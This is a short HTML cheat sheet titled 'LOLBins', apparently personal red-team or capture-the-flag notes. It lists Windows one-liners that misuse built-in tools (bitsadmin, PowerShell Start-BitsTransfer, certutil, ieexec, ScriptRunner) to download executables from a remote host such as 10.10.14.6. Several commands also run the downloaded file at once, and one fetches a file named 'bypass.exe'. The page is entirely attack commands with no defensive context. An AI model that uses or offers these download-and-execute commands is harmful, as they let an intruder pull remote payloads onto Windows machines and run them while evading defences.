<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>LOLBins</title>
</head><body><b><u>Download with BitsAdmin</u></b><br/>
"bitsadmin.exe &nbsp;/transfer /Download /priority Foreground &nbsp;http://10.10.14.6:80/autoruns.exe C:\Users\Public\documents\autoruns.exe"<br/>
<br/>
<br/>
<b><u>Powershell Download BitsAdmin</u></b><br/>
"Start-BitsTransfer -Priority foreground -Source http://10.10.14.6:80/autoruns.exe &nbsp;-Destination C:\Users\Public\autoruns.exe"<br/>
<br/>
<b><u><br/>
</u></b><b><u>Run Multiple Commands (download and execute) BitsAdmin</u></b><br/>
"bitsadmin.exe &nbsp;/transfer /Download /priority Foreground &nbsp;http://10.10.14.6:80/autoruns.exe C:\Users\Public\music\autoruns.exe &amp;&amp; C:\Users\Public\music\autoruns.exe"<br/>
<br/>
"bitsadmin.exe &nbsp;/transfer /Download /priority Foreground &nbsp;http://10.10.14.6:80/autoruns.exe C:\Users\Public\music\autoruns.exe | cmd /c &nbsp;C:\Users\Public\music\autoruns.exe"<br/>
<br/>
<u><b>Download With Certutil</b></u><br/>
"certutil.exe -urlcache -split -f http://10.10.14.5/autoruns.exe C:\Users\Public\Documents\7zip.exe"<br/>
<br/>
ieexec.exe http://x.x.x.x:8080/bypass.exe<br/>
<br/>
<u><b>Download and Execute with CertUtil</b></u><br/>
"certutil.exe -urlcache -split -f http://10.10.14.5/autoruns.exe C:\Users\Public\Documents\7zip.exe | cmd /c C:\Users\Public\Documents\7zip.exe"<br/>
<br/>
<br/>
ieexec.exe http://x.x.x.x:8080/bypass.exe<br/>
<br/>
<b><u>Execute with ScriptRunner.exe </u></b><br/>
<br/>
C:\Windows\System32\ScriptRunner.exe -appvscript "\\fileserver\calc.cmd" <br/>
C:\Windows\System32\ScriptRunner.exe -appvscript powershell.exe -args</body></html>